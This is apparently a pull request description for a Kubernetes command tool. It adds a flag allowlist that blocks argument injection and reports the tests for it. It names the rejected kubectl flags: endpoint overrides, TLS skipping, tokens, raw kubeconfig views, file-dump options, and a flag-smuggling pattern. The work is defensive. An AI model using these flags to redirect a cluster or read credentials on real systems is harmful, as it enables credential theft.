## Summary

- Closes the argument-level injection class on `holodeck.k8s.exec` (security review F05): a read-only verb safelist plus a shell-metacharacter reject still let through `kubectl` flags that carry no metacharacter and sit behind an allowed verb — endpoint (`--server`), disabled TLS trust (`--insecure-skip-tls-verify`), credential (`--token`, `--kubeconfig`) and context/cluster/user overrides, the raw kubeconfig view (`config view --raw`), and file-writing options (`cluster-info dump --output-directory=…`).
- `parse_kubectl_command` now validates **every** flag — in the global position before the verb *and* the argument position after it, in both attached (`--flag=value`) and separated (`--flag value`) forms — against a positive read-only allowlist (`_K8S_ALLOWED_FLAGS`): `-n`/`--namespace`, `-o`/`--output`, `-l`/`--selector`, `--field-selector`, `--sort-by`, logs-scoping options, etc. Endpoint, context, credential and TLS trust are owned by the appliance's own kubeconfig, never by the caller's command line. Off-allowlist flags (including unknown flags and streaming `--watch`) fail closed, and a separated value that itself starts with `-` is not swallowed as a preceding flag's value (so `--namespace --server=…` can't smuggle a rejected flag past the walk).
- The reject fires in the handler **before** any SSH transport is touched (proven by asserting `_run_command` is never awaited), and the rejection message names the flag but never echoes its (possibly secret) value.
- No new ops and no new MCP tools: `holodeck.k8s.exec` stays a single operation on the shared `call_operation` seam and remains approval-gated (`requires_approval=True`). Descriptor text, `docs/codebase/connectors-holodeck.md`, and the module/function docstrings updated to describe the flag allowlist.

## Already on `main` (containment)

The F05 **containment** (PR #3423, on `main` / v0.33.5) already made `holodeck.k8s.exec` `safety_level="dangerous"` + `requires_approval=True`, so every dispatch parks for a human before running. This PR adds the remaining defence the issue asks for — the argument-level flag allowlist — on top of that containment.

## Acceptance criteria

- [x] **Explicit positive argument schema; target configuration owns endpoint/context/credential/TLS** — implemented as the positive flag allowlist enforced by the handler (the authoritative gate). Endpoint/context/credential/TLS/proxy overrides are rejected, so those settings are owned by the appliance's kubeconfig, not the caller. *Scope note:* the operation keeps its free-form (approval-gated) `command` param rather than being split into per-verb typed ops (`holodeck.k8s.get`, …); that larger surface rework is a possible follow-through, but the positive flag allowlist delivers the issue's Desired outcome in full and is the mitigation the issue's "Recommended mitigation → Until then …" sequences as the shippable step.
- [x] **Reject endpoint/TLS/credential overrides, raw credential views, output-file/directory options and unknown flags** — `test_parse_kubectl_command_rejects_override_flags` (30-case matrix) + handler-level `test_k8s_exec_handler_rejects_override_flags_before_ssh`.
- [x] **Negative checks cover flags before/after the verb and attached/separate values without running commands on a real appliance** — the matrix carries `_pre`/`_post` and `_attached`/`_separated` variants; the handler test asserts `_run_command` is never awaited (no SSH).
- [x] **Ordinary approved inventory reads still work; output continues through audit/reduction and handle-based retrieval** — `test_parse_kubectl_command_accepts_allowed_read_flags` (17 cases incl. `-o json`/`-o yaml` for JSONFlux); the handler return shape `{stdout, stderr, exit_status}` is unchanged, so the audit/reduction/handle path is untouched; existing e2e park + dispatch tests still pass.
- [x] **Keep operations on the common `call_operation` seam; no per-vendor MCP tools; no governance bypass** — no new ops/tools; op stays approval-gated on the shared dispatch path.

## Test plan

- [x] `ruff check src/ tests/` (changed files) — clean
- [x] `ruff format --check` — clean
- [x] `mypy src/…/holodeck/ops_read.py` — clean
- [x] `.claude/hooks/code-quality.py --diff` — 0 blockers
- [x] `pytest tests/test_connectors_holodeck_ops.py` — passed (incl. new allow/reject matrices)
- [x] `pytest tests/test_connectors_holodeck_e2e.py` — passed
- [x] full backend unit lane — passed

## Out of scope

- `holodeck.config.show` / other `pwsh_run` ops (issue Out-of-scope).
- Re-provisioning the appliance identity / least-privilege of its kubeconfig (defense-in-depth, tracked separately).
- Splitting `holodeck.k8s.exec` into per-verb typed operations (larger surface rework; not required to close the argument-level injection).

## Adjacent findings (recorded, not fixed)

- `-o custom-columns-file=<path>` reads a local file on the appliance as a column template; it interprets each line as `HEADER:jsonpath` (errors on non-conforming input) rather than disclosing file contents, so it is out of the endpoint/TLS/credential/file-write scope of this task. Noted for a possible follow-up if `-o` value-content restriction is later wanted.
- `ops_read.py` is a large module (>600 lines, pre-existing); the code-quality gate warns but does not block. Not split here (surgical scope).

<!-- auto-implement-issue: fresh, iteration 1 -->

Closes evoila-bosnia/meho-internal#267
